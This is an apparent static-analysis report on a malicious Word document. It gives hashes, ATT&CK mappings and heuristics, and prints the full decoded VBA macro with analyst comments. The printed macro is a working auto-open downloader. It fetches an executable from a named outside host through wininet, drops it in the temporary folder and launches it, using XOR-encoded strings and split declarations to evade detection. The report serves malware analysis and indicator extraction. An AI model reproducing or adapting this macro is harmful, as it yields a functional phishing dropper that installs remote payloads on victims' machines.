Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7f9ad5e44e357130…

MALICIOUS

Office (OLE)

74.0 KB Created: 2015-05-01 06:32:00 Authoring application: Microsoft Office Word First seen: 2015-05-10
MD5: 973e8eac9bb4ae456f0a20f2e9a07b7e SHA-1: 96561f046f9002e5e47f613a049d662d2f6575a7 SHA-256: 7f9ad5e44e357130fd8dcfdceb01342b011106d41b92a92792b950882a938187
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer (wininet.dll InternetOpenUrlA/InternetReadFile download in the extracted macro; see ANTIONE in the listing below)

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro starts a chain of VBA calls (autoopen → COLTON → JOSPEH → DOMINGO → AUBREY → DARELL → LYNWOOD) that ends in two actions visible in the extracted source: ANTIONE fetches a URL through wininet.dll (InternetOpenA with User-Agent "ARNOLDO", InternetOpenUrlA, InternetReadFile) and writes the response with Open … For Binary into the folder returned by Scripting.FileSystemObject.GetSpecialFolder(2) (the temporary folder), and MICHAL then calls the Open method of a CreateObject instance on that file to launch it. The ProgIDs, file name and URL are stored as hex strings XOR-encoded with the key "NATHANAEL3DEL5" (module CORDELL) and decoded at runtime by FRANKLYN; hand-decoding them from the listing gives "Shell.Application", "Scripting.FileSystemObject", "\serebok5.exe" and hxxp://laurelwoodvirginia[.]com/654/46.exe (confirm with a script before using as indicators). The download's return value is discarded by an empty If block in LYNWOOD, so the launch is attempted whether or not the fetch succeeded. The legacy WordBasic auto-exec marker adds no independent evidence here: that heuristic's own description says it fires only when no VBA project is recovered, which contradicts the extracted macros.bas below, and the match is most plausibly the same 'autoopen' name.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set RAYFORD = CreateObject(SHERWOOD)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: a VBA project was in fact recovered (the 8422-byte macros.bas below, whose ThisDocument module defines Sub autoopen), so the "no modern VBA project" premise of this heuristic does not hold here; the marker is most plausibly the same autoopen name and this finding should be treated as redundant with OLE_VBA_AUTOOPEN rather than as independent evidence.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8422 bytes
SHA-256: 3dd0d2b0c703adb821a3574b698ebe4551ff3684413b59c2b5b8951bb4fe72fd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module "ThisDocument" (document class module). It holds the auto-exec entry
' point autoopen; the other eight Attribute VB_Name blocks below are standard
' modules that olevba concatenated into this single macros.bas. The call chain
' is deliberately spread across them: autoopen -> COLTON -> JOSPEH -> DOMINGO
' -> AUBREY -> DARELL -> LYNWOOD -> ANTIONE (download) and MICHAL (launch).

' Second hop of the auto-exec chain (autoopen -> COLTON -> JOSPEH).
' FELIX is never read; the literal 298 passed by autoopen is padding.
Sub COLTON(FELIX As Long)
JOSPEH
End Sub

' Auto-execution entry point: Word runs a Sub named AutoOpen (VBA names are
' case-insensitive) when the document is opened with macros enabled. Its only
' action is calling COLTON, which starts the chain that ends in the
' download-and-launch routines ANTIONE and MICHAL. This is the line the
' OLE_VBA_AUTOOPEN heuristic matched.
Sub autoopen()
COLTON (298)
End Sub


Attribute VB_Name = "ANDREAS"
' Module "ANDREAS": the JOSPEH hop of the call chain plus three helpers -
' HAYWOOD (decodes the FileSystemObject ProgID), GASTON (one XOR step of the
' string decoder) and LOWELL (FreeFile wrapper used when the payload is written).


' Third hop of the chain (COLTON -> JOSPEH -> DOMINGO). BERT is never used and
' the For loop runs only once (TONEY is doubled to 66 on the first pass, which
' already exceeds the upper bound), so everything except the DOMINGO call is
' padding with no observable effect.
Public Sub JOSPEH()
        Dim BERT As Long

    Dim TONEY As Long
For TONEY = 33 To 36
TONEY = TONEY + TONEY
Next TONEY

DOMINGO (8.2)

End Sub



' Returns the ProgID used by EZEKIEL's CreateObject. FRANKLYN(JOHNSON) is the
' XOR-decoded string and StrReverse flips it; working the decoder by hand over
' JOHNSON gives "tcejbOmetsySeliF.gnitpircS", i.e. the reversed form of
' "Scripting.FileSystemObject" (re-check with a script before relying on it).
' RENATO is written to, but the only call site passes the literal 44, so the
' writes are padding.
Public Function HAYWOOD(RENATO As Integer) As String
HAYWOOD = FRANKLYN(JOHNSON)
RENATO = RENATO + 55
HAYWOOD = StrReverse(HAYWOOD)
RENATO = 0
End Function

' One step of the string decoder: XORs two character codes and returns the
' resulting character. FRANKLYN calls it with (cipher byte, key character code).
Public Function GASTON(ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
    GASTON = ChrW(GAYLORD Xor MANUAL)
End Function


' Wrapper around FreeFile: returns the next unused VBA file number. The string
' argument is ignored. ANTIONE uses the result as the channel for the
' Open / Put / Close that writes the downloaded payload to disk.
Public Function LOWELL(BRODNATHANIAL As String) As Integer
    LOWELL = FreeFile
End Function


Attribute VB_Name = "WALTON"
' Module "WALTON": configuration constants for the wininet download, plus
' DOMINGO/AUBREY (chain hops), WARNER (%TEMP% lookup) and MICHAL (launcher).

' RUEBEN: size of the fixed-length buffer handed to InternetReadFile in ANTIONE.
Public Const RUEBEN = 5555
' BARRETTK: lpszAgent passed to InternetOpenA in WALLY, i.e. the HTTP
' User-Agent the download request carries ("ARNOLDO") - a usable network indicator.
Public Const BARRETTK As String = "ARNOLDO"
' HARLAND: dwAccessType argument of InternetOpenA (1 = INTERNET_OPEN_TYPE_DIRECT in wininet.h).
Public Const HARLAND = 1
' ELIJAH: dwFlags passed to InternetOpenUrlA in CEDRICK; &H4000000 matches
' INTERNET_FLAG_NO_CACHE_WRITE in wininet.h (verify against the SDK header).
Public Const ELIJAH = &H4000000



' Fourth hop of the chain; just forwards to AUBREY. SANTOS and the string
' literal passed to AUBREY are never read.
Sub DOMINGO(SANTOS As Double)

AUBREY ("DEANGELOFILIBERTO")
End Sub


' Returns ARLEN.GetSpecialFolder(2). GetSpecialFolder is a
' Scripting.FileSystemObject method and the only caller (LYNWOOD) passes the
' object created by EZEKIEL; in the Scripting type library the constant 2 is
' TemporaryFolder, so this yields the user's %TEMP% folder (as a Folder
' object) - the drop location for the downloaded payload.
Public Function WARNER(ByRef ARLEN As Object) As Object
Set WARNER = ARLEN.GetSpecialFolder(2)
End Function



' Final stage: launches the dropped file. SHERWOOD is the decoded ProgID
' (BRITT hand-decodes to "Shell.Application"), and the object's Open method is
' called on TITUS & AMBROSE - TITUS is the %TEMP% Folder object from WARNER
' (the concatenation uses its default Path property) and AMBROSE is the decoded
' file name, giving <temp>\serebok5.exe. Shell.Application.Open ShellExecutes
' that path, i.e. runs the downloaded executable.
' RAYFORD is never declared (no Option Explicit in this module), so it is an
' implicit Variant; CRISTOBAL is unused and the Boolean return is never set,
' so the function always returns False. The OLE_VBA_CREATEOBJ heuristic above
' matched the CreateObject line in this function.
Public Function MICHAL(ByRef TITUS As Object, ByRef AMBROSE As String, CRISTOBAL As Double) As Boolean
Dim SHERWOOD As String
SHERWOOD = FRANKLYN(BRITT)
Set RAYFORD = CreateObject(SHERWOOD)
Dim RAYMON As Integer
RAYMON = RAYFORD.Open(TITUS & AMBROSE)
End Function

' Fifth hop. `DARELL LESLEY * 2` is the call-statement form and invokes DARELL
' with the value 2; the LESLEY arithmetic around it and the SANTIAGO argument
' are padding. No return value is assigned.
Public Function AUBREY(SANTIAGO As String)
Dim LESLEY As Integer
LESLEY = 1
DARELL LESLEY * 2
LESLEY = LESLEY + 4
End Function







Attribute VB_Name = "RHETT"
' Module "RHETT": 64-bit Declare for wininet InternetOpenA under the alias
' EMMITT (the 32-bit twin is in module DOUGLASS), plus JORDON and DARELL.
' The four wininet entry points are spread over modules RHETT, PALMER,
' DOUGLASS and VIRGILIO and hidden behind name-like aliases so that no single
' module reads like a downloader.
#If VBA7 And Win64 Then
Public Declare _
PtrSafe Function _
EMMITT Lib "wininet.dll" Alias _
"InternetOpenA" (ByVal RALEIGH As String, ByVal GARFIELD As Long, ByVal MAXIMO As String, ByVal MCKINLEY As String, ByVal TEODORO As Long) As LongPtr
#End If

' Len wrapper: returns the character count of BRODNATHANIAL. Used by FRANKLYN
' (loop bound), GILBERTO (key length) and ANTIONE (size of the downloaded data).
Public Function JORDON(BRODNATHANIAL As String) As Long
JORDON = Len(BRODNATHANIAL)
End Function


' Sixth hop. Creates a Scripting.FileSystemObject via EZEKIEL and hands it to
' LYNWOOD, which performs the download and the launch. Everything else is
' padding: both For loops exit after one pass because the loop variable is
' bumped past the bound inside the body, `If ELDEN > ELDEN * 100 Then End`
' cannot be true for the positive ELDEN reached here, PORTER is passed
' uninitialised (LYNWOOD overwrites it), and DORSEY is written to a by-ref
' parameter whose caller passed a literal. The return value is never assigned.
Public Function DARELL(DORSEY As Double)

Dim PORTER As Object


    Dim ELDEN As Long
For ELDEN = 14 To 15
ELDEN = ELDEN + 15
Next ELDEN
    

Dim HAI  As Object


For ELDEN = 10 To 20
ELDEN = ELDEN + 60
Next ELDEN
    

' HAI = the FileSystemObject (CreateObject on the decoded ProgID).
Set HAI = EZEKIEL("")
ELDEN = ELDEN + 5
Dim LINDSAY As Boolean

If ELDEN > ELDEN * 100 Then End
' Real work: download to %TEMP% and launch (see LYNWOOD).
LINDSAY = LYNWOOD(PORTER, HAI)
DORSEY = DORSEY + 24
End Function



Attribute VB_Name = "PALMER"
' Module "PALMER": 64-bit Declares for wininet InternetReadFile (alias RASHAD)
' and InternetOpenUrlA (alias ABRAM); the 32-bit twins are in module DOUGLASS.
' Also holds GILBERTO (key lookup), CEDRICK (URL open) and ARDEN (the XOR key).
' The declarations are split one token per line with `_` continuations, which
' defeats single-line pattern matches on "Declare ... Lib".
#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
RASHAD Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal WHITNEY As LongPtr, ByVal BARRETT As String, ByVal JAMEY As Long, VALENTINE As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
ABRAM Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal ADALBERTO As LongPtr, ByVal CHUNG As String, ByVal FERMIN As String, ByVal HIPOLITO As Long, ByVal ISAIAS As Long, ByVal TYRON As Long) As LongPtr
#End If

' Key-schedule step of the decoder: returns the character code of the key
' NATHANIAL at 1-based position ((CLAUD Mod Len(key)) + 1). Note the offset:
' CLAUD starts at 1, so the first cipher byte is paired with the key's second
' character, not its first. DANILO's first argument (17) is ignored.
Public Function GILBERTO(ByRef NATHANIAL As String, ByRef CLAUD As Long) As Integer
GILBERTO = AscW(DANILO(17, NATHANIAL, ((CLAUD Mod JORDON(NATHANIAL)) + 1), 1))
End Function




' Opens the download URL on an existing wininet session. GUADALUPE is
' FRANKLYN(LEIGH), the URL decoded at runtime (see the CORDELL constants), and
' ABRAM is InternetOpenUrlA(session NOAH, URL, no extra headers, 0, ELIJAH, 0).
' The resulting request handle is returned through the by-ref GRADY parameter
' (BENTON in ANTIONE); the function itself always returns True, even when the
' handle is 0, so callers must check GRADY instead. The PHIL loop and CLARK are
' padding. The #If picks LongPtr or Long for the handle types.
#If VBA7 And Win64 Then
       Public Function CEDRICK(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
    #Else
       Public Function CEDRICK(ByRef GRADY As Long, NOAH As Long) As Boolean
    #End If
        Dim PHIL As Double
Dim GUADALUPE As String
Dim CLARK As Long
    GUADALUPE = FRANKLYN(LEIGH)

For PHIL = 14 To 18
PHIL = PHIL + 2.1
Next PHIL
    GRADY = ABRAM(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
    CEDRICK = True
End Function

' Assembles the XOR key used by FRANKLYN/GILBERTO: MOSE & ISREAL =
' "NATHAN" & "AEL3DEL5" = "NATHANAEL3DEL5" (14 characters). Splitting the key
' across two constants keeps it out of a plain string search.
Public Function ARDEN() As String
ARDEN = MOSE & ISREAL
End Function




Attribute VB_Name = "DOUGLASS"




' Module "DOUGLASS": 32-bit Declares (the #Else branch of VBA7 And Win64) for
' all four wininet APIs, plus DANILO (Mid$ wrapper), WALLY (session open) and
' EZEKIEL (FileSystemObject creation).

' GAYLE is not referenced anywhere in this listing.
Public Const GAYLE = "GARRET"

' On 32-bit Office the four APIs are declared here without PtrSafe/LongPtr;
' the 64-bit branch is empty because the PtrSafe versions live in modules
' RHETT, PALMER and VIRGILIO. InternetCloseHandle (FAUSTO) is declared ByRef
' although the API takes the HINTERNET by value - see module VIRGILIO.
#If VBA7 And Win64 Then
#Else
Public Declare Function FAUSTO Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef LAWERENCE As Long) As Long
Public Declare Function EMMITT Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal RALEIGH As String, ByVal GARFIELD As Long, ByVal MAXIMO As String, ByVal MCKINLEY As String, ByVal TEODORO As Long) As Long
Public Declare Function RASHAD Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal WHITNEY As Long, ByVal BARRETT As String, ByVal JAMEY As Long, VALENTINE As Long) As Integer
Public Declare Function ABRAM Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal ADALBERTO As Long, ByVal CHUNG As String, ByVal FERMIN As String, ByVal HIPOLITO As Long, ByVal ISAIAS As Long, ByVal TYRON As Long) As Long
#End If


' Mid$ wrapper used by the decoder: returns MANUAL characters of BRODNATHANIAL
' starting at 1-based position GAYLORD. SAMMY is incremented, but every caller
' passes a literal, so the write has no effect.
Public Function DANILO(SAMMY As Long, ByRef BRODNATHANIAL As String, ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
    DANILO = Mid$(BRODNATHANIAL, GAYLORD, MANUAL)
    SAMMY = SAMMY + 52
End Function
' Opens the wininet session: InternetOpenA(lpszAgent = BARRETTK "ARNOLDO",
' dwAccessType = HARLAND (1), no proxy, no proxy bypass, dwFlags = 0) via the
' EMMITT alias. Returns the session handle, or 0 on failure (ANTIONE bails out
' on 0). The #If selects the LongPtr or Long return type.
#If VBA7 _
    And Win64 Then
Public Function WALLY() As LongPtr
 #Else
Public Function WALLY() As Long
 
 #End If
 
 WALLY = EMMITT(BARRETTK, HARLAND, vbNullString, vbNullString, 0)
End Function


' Creates the Scripting.FileSystemObject used to locate %TEMP% (HAYWOOD
' returns the decoded ProgID). ISMAEL is unused; all callers pass "".
Public Function EZEKIEL(ISMAEL As String) As Object
Set EZEKIEL = CreateObject _
(HAYWOOD(44))
End Function





Attribute VB_Name = "CORDELL"
' Module "CORDELL": the obfuscated string table and the decoder FRANKLYN.
' Each hex constant is a byte string XOR-encoded with the key "NATHANAEL3DEL5"
' (ARDEN) and decoded at runtime by FRANKLYN. The values below were decoded
' by hand from this listing; confirm with a script before using them as IOCs.
' BRITT -> "Shell.Application" (ProgID used by MICHAL to launch the payload).
Public Const BRITT = "123C2D2D226F043C43282C2F543A283B26"
' BENEDICT -> "\serebok5.exe" (file name appended to %TEMP% in LYNWOOD/MICHAL).
Public Const BENEDICT = "1D272D332B232A27066A203450"

' LEIGH -> hxxp://laurelwoodvirginia[.]com/654/46.exe (download URL opened by
' CEDRICK; defanged here - treat as a network indicator).
Public Const LEIGH = "29203C31746E6A205231372959392E3B2C37273322255D2D246256212C7B7E747A6E717A1D213D29"
' JOHNSON -> "tcejbOmetsySeliF.gnitpircS", which HAYWOOD reverses to
' "Scripting.FileSystemObject".
Public Const JOHNSON = "35372D2B2C0E282947373C1F5022281266262028313C5A36261F"
' MOSE & ISREAL form the XOR key (assembled in ARDEN).
Public Const MOSE = "NATHAN"
Public Const ISREAL = "AEL3DEL5"



' String decoder for the CORDELL constants. REYNALDO is a hex string; for
' each byte (a pair of hex digits, extracted by FRANCESCO/MODESTO) it XORs the
' byte with one key character chosen by GILBERTO and appends the result
' (GASTON). The key is ARDEN ("NATHANAEL3DEL5") and the pairing is offset by
' one: byte i meets key character ((i Mod 14) + 1), so byte 1 meets "A" and
' byte 14 meets "N". The KRISTOFER loop is dead padding (43..44 never equals
' 55). The loop bound JORDON(REYNALDO) / 2 is floating-point division; every
' constant in CORDELL has even length, so it is exact here.
Public Function FRANKLYN(REYNALDO As String) As String
    
    Dim GAYLORD As Integer
    Dim MANUAL As Integer
    Dim NATHANIAL As String
    NATHANIAL = ARDEN
    
    Dim KRISTOFER As Integer
For KRISTOFER = 43 To 44
If KRISTOFER = 55 Then End
Next KRISTOFER
    
    Dim CLAUD As Long
    Dim TERENCE As String
    For CLAUD = 1 To (JORDON(REYNALDO) / 2)
        GAYLORD = FRANCESCO(REYNALDO, CLAUD)
        MANUAL = GILBERTO(NATHANIAL, CLAUD)
        TERENCE = TERENCE + GASTON(GAYLORD, MANUAL)
    Next CLAUD
   FRANKLYN = TERENCE
End Function

Attribute VB_Name = "ELLSWORTH"
' Module "ELLSWORTH": FRANCESCO and MODESTO (hex-pair extraction for the
' decoder) and LYNWOOD, the driver that downloads the payload and launches it.

' Returns the CLAUD-th byte of the hex string REYNALDO as an Integer: MODESTO
' maps CLAUD to the 1-based offset of its two hex digits and Val parses them
' with the "&H" prefix. DANILO's first argument (12) is ignored.
Public Function FRANCESCO(ByRef REYNALDO As String, ByRef CLAUD As Long) As Integer
 FRANCESCO = Val("&H" & (DANILO(12, REYNALDO, MODESTO(CLAUD), 2)))
End Function


' Download-then-launch driver (seventh hop). TITUS is overwritten with the
' %TEMP% Folder object of a fresh FileSystemObject (WARNER(EZEKIEL(""))); HOMER,
' the FSO created by DARELL, is never used. AMBROSE is the decoded file name
' from BENEDICT, so JODY = TITUS & AMBROSE is the full drop path (the Folder's
' default Path property is used in the concatenation). ANTIONE(475, JODY)
' downloads to that path, but its Boolean result is discarded by the empty If
' block, so MICHAL (CreateObject(...).Open on the same path) is attempted
' whether or not the fetch succeeded. The RENALDO loop is padding (one pass).
Public Function LYNWOOD(ByRef TITUS As Object, ByRef HOMER As Object) As Boolean

Dim RENALDO As Long
Set TITUS = WARNER(EZEKIEL(""))

Dim JODY

Dim AMBROSE As String
AMBROSE = FRANKLYN(BENEDICT)

For RENALDO = 11 To 33
RENALDO = RENALDO * 4
Next RENALDO
JODY = TITUS & AMBROSE


' Download result ignored: execution continues to the launch regardless.
If ANTIONE(475, JODY) Then
End If


LYNWOOD = MICHAL(TITUS, AMBROSE, 11)

End Function

' Maps the 1-based byte index CLAUD to the 1-based offset of its first hex
' digit in the encoded string (1 -> 1, 2 -> 3, 3 -> 5, ...).
Public Function MODESTO(ByRef CLAUD As Long) As Long
 MODESTO = (2 * CLAUD) - 1
End Function


Attribute VB_Name = "VIRGILIO"
' Module "VIRGILIO": 64-bit Declare for wininet InternetCloseHandle (alias
' FAUSTO) and the download routine ANTIONE. LAWERENCE is declared ByRef while
' InternetCloseHandle takes the HINTERNET by value, so the call most likely
' passes the address of the variable rather than the handle and fails to
' close it (the 32-bit Declare in DOUGLASS has the same defect).
#If VBA7 And Win64 Then
Public Declare _
PtrSafe Function _
FAUSTO Lib "wininet.dll" Alias _
"InternetCloseHandle" (ByRef LAWERENCE As LongPtr) As Long
#End If




' The downloader. MALCOM is the destination path (<temp>\serebok5.exe from
' LYNWOOD); KOREY is unused. Flow: WALLY opens a wininet session (abort if 0),
' CEDRICK opens the decoded URL on it and returns the request handle in BENTON,
' the response is pulled with InternetReadFile (RASHAD) in chunks of RUEBEN
' (5555) characters into the fixed-length buffer BARRETT and accumulated in
' RALEIGH, then written to MALCOM with Open ... For Binary / Put.
' Analyst notes: CRISTOPHER and CORTEZ are never declared (implicit Variants;
' this module has no Option Explicit). The first chunk is copied with
' `RALEIGH = BARRETT`, i.e. the whole 5555-character buffer regardless of the
' byte count reported in LAMONT, so a response shorter than the buffer is
' written with trailing buffer contents, and Len(RALEIGH) is never 0 in that
' branch - the function therefore returns True whenever a request handle was
' obtained, not only when data arrived. Because the buffer is a VBA String,
' the bytes also pass through the ANSI/Unicode conversion VBA applies to
' Declare'd String arguments; whether the dropped file is byte-identical to
' the served one should be checked in a sandbox. MILES, MICAH, LUCAS and the
' two `If BOYCE ... Then End` lines are padding.
Public Function ANTIONE(KOREY As Double, ByVal MALCOM As String) As Boolean
    
        Dim LAMONT As Long
    Dim BARRETT As String * RUEBEN, RALEIGH As String
    Dim MILES As Integer, MICAH As Double
    #If VBA7 And Win64 Then
        Dim KASEY As LongPtr, BENTON As LongPtr
    #Else
        Dim KASEY As Long, BENTON As Long
    #End If

    ' KASEY = InternetOpenA session handle (User-Agent "ARNOLDO").
    KASEY = WALLY
    If KASEY = 0 Then
        Exit Function
    End If
    Dim LUCAS As Boolean
    
    ' BENTON = InternetOpenUrlA request handle for the decoded URL (CEDRICK
    ' always returns True, so only BENTON is meaningful).
    If CEDRICK(BENTON, KASEY) Then
    End If
    If BENTON = 0 Then
        CRISTOPHER = 0
    Else
        ' First read: LAMONT receives the bytes read, but the whole buffer is copied.
        RASHAD BENTON, BARRETT, RUEBEN, LAMONT
        RALEIGH = BARRETT
          Dim BOYCE As Integer
          BOYCE = 0
          BOYCE = BOYCE + 33
If BOYCE > BOYCE + 40 Then End
        ' Subsequent reads append only the LAMONT bytes actually read.
        Do While LAMONT <> 0
            RASHAD BENTON, BARRETT, RUEBEN, LAMONT
                    RALEIGH = RALEIGH + Mid(BARRETT, 1, LAMONT)
        Loop
             CRISTOPHER = JORDON(RALEIGH): _
             CORTEZ = LOWELL("JERRY")
        BOYCE = BOYCE + 46
        
        ' Write the accumulated response to the drop path in %TEMP%.
        Open _
        MALCOM For Binary As #CORTEZ
        Put #CORTEZ, , RALEIGH
    If BOYCE < 0 Then End
        Close #CORTEZ
    End If
    ' InternetCloseHandle on both handles (declared ByRef - see module header).
    FAUSTO BENTON
    FAUSTO KASEY
    RALEIGH = ""
    If CRISTOPHER Then
        ANTIONE = True
    End If
End Function